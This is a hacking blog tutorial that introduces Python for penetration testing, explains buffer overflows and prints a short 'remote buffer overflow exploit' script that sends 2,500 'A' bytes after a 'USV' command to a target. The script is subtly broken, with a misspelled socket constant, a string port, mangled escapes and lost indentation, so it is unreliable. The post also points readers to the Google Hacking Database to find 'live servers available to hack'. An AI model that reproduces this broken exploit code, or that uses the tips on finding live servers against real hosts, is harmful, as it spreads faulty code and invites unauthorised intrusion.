Tips and Hacks Everyone Should Know

How to Hack Using Python – Python for Pentesters & Hackers

0 244

In this article, we will learn how to hack using Python and how you can use Python to create hacking tools that make your work easier. Using Python you will automate many of the exploits and penetration tests that you have learned in our ethical hacking course and those you will explore and learn as you work towards becoming the best ethical hacker the world has ever seen.

If you know computers well enough to understand how computer programs are written and how they work, you will agree with me that Python is a brilliant language. It is a language that you can use to create dynamic and very useful tools just by stringing together [mostly] English phrases that even a newbie can understand. It is regarded as the lazy programmer’s language that can produce little scripts of a handful lines of code that can do so much.

Python for Pentesters & Hackers

Here at Hacking Pages, we are committed to offering valuable knowledge that you will find beneficial beyond the basic satisfaction of curiosity. You have invested hours in learning the various tactics that seasoned hackers use every day, but you should know that this is just the beginning.

In the Black Hat Python book, the author Justin Seitz goes in-depth to introduce Python as the programming language of the future. The most skilled hackers, both those who do it for fun, as a career, or for their selfish purposes (read: blackhat), are all programmers first. If you are not a good programmer, this is the perfect opportunity for you to learn to be one using the easiest and most versatile language there is and get to apply it to something practical and fun, such as hacking.

You could still be a good hacker without learning to write Python scripts, but you would essentially be a script kiddie. No one wants to remain a script kiddie forever, but it is a good enough place to start. It’s essential to learn how to hack using Python. So, here we go.

If you do not have Python installed on your computer, I suggest you download and install it. You can set aside the VMware virtual environment that you use to run Kali Linux for this hacking guide.

You can download the latest version of Python interpreter version 3.6 (or 3.5) and a text editor (to write your code) before you begin. If you are completely new to Python, I would suggest you pause this article first and get the Black Hat Python book to learn all the basics before you are proficient enough to proceed with the next exploit.

How to Hack Using Python

If you have ever come across the term “Buffer overflow,” chances are it was a reference to a vulnerability in a specific software or script. In information science, buffer overflow vulnerability refers to a programming error that results in a memory access exception.

A buffer overflow occurs when a process in the program attempts to store data that exceed the maximum limits of a fixed-length buffer, hence overwriting data contained in adjacent memory locations including the program’s “flow data.” This causes the process to terminate with a Segmentation Fault Error.

When there is a Segmentation Fault Error, that is to say when the data overflows to the next instruction location. It is possible to take control of that instruction via the execution flow and inject arbitrary commands into the system to process.

Create a Remote Buffer Overflow Exploit

In this hack, you will write a Python script that triggers this error and injects commands you specify so that you can take control of the host or simply find out what you want to know about a process in the memory location the data overflows too.

Step 1: Preparation and Setup

At this point of our how to hack using Python guide, you should have already learned all the basics about programming in Python, especially what the different data types are, how to write Python scripts, save .py files, and run the scripts. You should have Python 3 installed in your system (Linux or Windows are fine), and you should have an active internet connection. This exploit uses a TCP internet connection.

First off, we need to find a server to test our exploit on. As with every exercise in this course, we insist that you only test this exploit on a machine you have permission to test on. Attempting to carry out hacks on strangers’ computers over the Internet is illegal and could have very serious legal repercussion. Do not try it.

Finding a server to try your buffer overflow hack will be a bit of a challenge, but there are resources on the internet that you can use to find the right dork. You can begin by checking out the Google Hacking Databases provided by the good folks at exploit-db for live servers available to hack or for vulnerable software you can test your skills on.

Step 2: Writing the Python Script

Once you find a server to try the buffer overflow hack on, the next step is much more fun: writing the code. We will first import the sys and socket libraries, then write the code to execute.

Start your text editor and enter the following code:

#!/usr/bin/python
import sys
import socket
for carg in sys.argv:
if carg == “-s”:
argnum = sys.argv.index(carg)
argnum += 1
host = sys.argv[argnum]
elif carg == “-p”:
argnum = sys.argv.index(carg)
argnum += 1
port = sys.argv[argnum]
buffer = “\x41″ * 2500
s = socket.socket(socket.AF_INET, socket.SOCK_STRAEM)
s.connect((host,port))
s.send(“USV ” + buffer + “//r//n//r”)
s.close()
print (“Overflow buffer exploit successfully sent!”)
What this Python script does?
The first line imports the system library while the second imports the socket library that the script needs to run. The script will create a buffer with the value \x41 and multiplies it 2,500 times and sends it to the socket, which is declared as “s“. The buffer connects to the socket and sends the string USV, the new value of the buffer (which is 2500 times the value of \x41 before closing it. The script will display the message in print when the process is a success.

Step 3: Executing the Remote Buffer Overflow Exploit Script

After you have saved the script, the next step is to execute it. Start Python (from the terminal or command prompt by typing Python and execute the script by switching the working directory to the location of the .py file. If you are unsure how to do this, it is all explained in detail in the Black Hat Python book.

Congratulations! You have successfully written your first Python script exploit and executed it. You can also use Python to automate the many exploits we have studied in this white hat ethical hacking guide, including the SQL injection hack and the Nmap hack.

Hacking with Python – Video Tutorials

Below is a list of 13 excellent video tutorials from HackerSploit that will teach you how to hack using Python. In this video series, you will learn how to use Python to create network tools and ethical hacking scripts. It will take you from beginner to intermediate, or even advanced in Python. It’s the perfect place to start learning Python for non programmers.

Conclusion

Learning to code with Python is the perfect place to start your journey as an ethical hacker. You will also need other prerequisite computer skills including understanding of how most operating systems work (they are written in C/C++; hence you should find out what makes these languages stand out) and how computer networking works. The topics we have covered in this article and in the white hat ethical hacking guide are proof enough that hacking is not rocket science.

I hope this article helped you to figure out how to hack using Python and how to create hacking tools that make your work as a hacker easier. Feel free to share your thoughts in the comments section below.


Leave A Reply

Your email address will not be published.